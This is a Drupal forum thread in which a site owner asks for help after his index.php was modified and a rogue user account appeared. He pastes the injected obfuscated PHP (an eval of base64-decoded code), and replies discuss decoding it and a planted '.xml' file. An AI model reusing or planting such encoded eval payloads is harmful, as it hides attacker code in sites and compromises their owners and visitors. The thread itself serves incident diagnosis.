I'm currently running Drupal 5.3 (will upgrade to 5.6 today).
Twice so far, changes have been made to my index.php file.
Once the end tag was removed and today I noticed that the following code was added to the bottom of the file:
<?
eval
(base64_decode
("ZWNobyBldmFsKGJhc2U2NF9kZWNvZGUoIkNtVnljbTl5WDNKbGNHOXlkR2x1Wnlnd0tUc0tjbVZ4ZFdseVpTZ25Mbmh0YkNjcE93b2tlRzFzY25CalltRnVibVZ5SUQwZ2JtVjNJSEJvY0VGa2MxOVliV3hTY0dNb0ozQndZekV3TUM1cGJtWnZKeXdnSnk5d2FIQkJaSE5PSnlrN0NpUjRiV3h5Y0dOaVlXNXVaWEl0UG5acFpYY29KM3B2Ym1VNk1USW5MQ0F3TENBbkp5d2dKeWNzSUNjd0p5azdDZz09IikpOyA
=")); ?>
On both occasions I noticed that a user had been created even though I have set the option for administrator approval of new users.
The last time this happened I immediately upgraded to 5.3.
Any idea what could be doing this?
Also, I use the site as an informational site and don't need to add users.
Is there any way that I can completely shut down addition of new users?
Thanks!
John W Babiak
Comments
...
I've seen a similar report before. There's a method here, and perhaps the security team would know something about it.
If you run this string, twice, in a base64 decoder you get:
(I typed some of this in google, and did a whois, but couldn't find something useful.) Note that the cracker installed a '.xml' file there and it's worth checking who's the owner.
Once the cracker can run PHP code on your account, and he can, whatever you do in Drupal's administration is futile.
I've had this happen a
I've had this happen a couple times fairly recently on a few different sites. In each case it was a server level exploit and not something related to drupal specifically as far as we could tell.